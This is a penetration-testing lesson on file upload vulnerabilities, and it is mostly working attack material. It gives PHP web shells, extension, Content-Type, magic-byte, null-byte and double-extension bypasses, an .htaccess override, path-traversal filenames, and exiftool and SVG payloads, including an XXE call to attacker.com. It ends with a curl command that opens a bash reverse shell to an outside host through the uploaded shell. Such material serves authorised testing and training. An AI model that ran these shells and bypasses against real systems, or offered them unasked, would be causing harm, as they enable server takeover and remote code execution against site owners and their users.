Web Application Attacks
File Upload Vulnerabilities
4 min read
File upload functions can lead to remote code execution if improperly secured. This lesson covers common upload bypasses.
Understanding File Upload Attacks
When applications allow file uploads without proper validation, attackers can:
Attack Vectors:
├── Upload web shells (PHP, JSP, ASP)
├── Overwrite configuration files
├── Upload malicious executables
└── Store malware for distribution
Basic Web Shell Uploads
Simple PHP Shell
<?php system($_GET['cmd']); ?>
Save as shell.php and upload. Access via:
http://target.com/uploads/shell.php?cmd=whoami
More Functional PHP Shell
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Bypassing Upload Filters
Extension Blacklist Bypass
Try alternative extensions:
PHP:
.php3, .php4, .php5, .php7
.phtml, .phps, .pht, .phar
.PHP (case variation)
.php.jpg (double extension)
ASP:
.asp, .aspx
.asa, .cer, .cdx
.ashx, .asmx
JSP:
.jsp, .jspx
.jsw, .jsv, .jspf
Content-Type Bypass
Modify the Content-Type header in Burp Suite:
Original: Content-Type: application/x-php
Modified: Content-Type: image/jpeg
Original: Content-Type: text/php
Modified: Content-Type: image/png
Magic Bytes Bypass
Add valid image headers before PHP code:
GIF:
GIF89a
<?php system($_GET['cmd']); ?>
PNG (hex):
\x89PNG\r\n\x1a\n
<?php system($_GET['cmd']); ?>
JPEG:
\xFF\xD8\xFF\xE0
<?php system($_GET['cmd']); ?>
Null Byte Bypass (Old PHP)
shell.php%00.jpg
shell.php\x00.jpg
Double Extension
shell.php.jpg
shell.jpg.php
shell.php.png
shell.php%00.png
.htaccess Upload
If you can upload .htaccess files, enable PHP execution:
# .htaccess content
AddType application/x-httpd-php .jpg
Then upload shell.jpg containing PHP code.
Path Traversal in Filename
Try to upload outside the intended directory:
filename="../shell.php"
filename="../../var/www/html/shell.php"
filename="..\..\..\inetpub\wwwroot\shell.aspx"
Image Embedding
Exiftool Injection
# Inject PHP into image metadata
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# Rename to .php.jpg
mv image.jpg shell.php.jpg
Using GIF
# Create minimal GIF with PHP
echo -e 'GIF89a;\n<?php system($_GET["cmd"]); ?>' > shell.gif.php
SVG File Upload
SVG files can contain malicious scripts:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg onload="alert('XSS')" xmlns="http://www.w3.org/2000/svg">
<defs>
<font id="x"><font-face font-family="exploit"/></font>
</defs>
</svg>
For SSRF:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "http://attacker.com/"> ]>
<svg>&xxe;</svg>
Testing Methodology
Step 1: Understand the Upload Function
Questions to answer:
├── What file types are allowed?
├── Where are files stored?
├── Can you access uploaded files directly?
├── What naming convention is used?
└── Are there size restrictions?
Step 2: Test Basic Upload
# Simple PHP shell
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Try to upload and access
Step 3: Try Bypasses
1. Extension variations
2. Content-Type manipulation
3. Magic bytes
4. Double extensions
5. Null bytes
6. Case variations
Step 4: Find Upload Location
# Common locations
/uploads/
/images/
/files/
/media/
/attachments/
/user_uploads/
Bypass Cheat Sheet
| Bypass Type | Technique |
|---|---|
| Extension blacklist | .phtml, .php5, .phar |
| Content-Type | Change to image/jpeg |
| Magic bytes | Add GIF89a prefix |
| Double extension | shell.php.jpg |
| Null byte | shell.php%00.jpg |
| Case bypass | shell.PHP, shell.Php |
| .htaccess | Allow .jpg as PHP |
Post-Upload Actions
After successful upload:
# Access the shell
curl "http://target.com/uploads/shell.php?cmd=id"
# Get reverse shell
curl "http://target.com/uploads/shell.php?cmd=bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.5/4444+0>%261'"
File Upload Testing Workflow
1. Identify upload functionality
2. Upload normal file, note location
3. Try PHP shell with .php extension
4. If blocked, try extension bypasses
5. Try Content-Type manipulation
6. Try magic byte injection
7. Try double extensions
8. Check for .htaccess upload
9. Try path traversal in filename
10. Access uploaded shell
With web attacks covered, we'll move to post-exploitation and privilege escalation in the next module. :::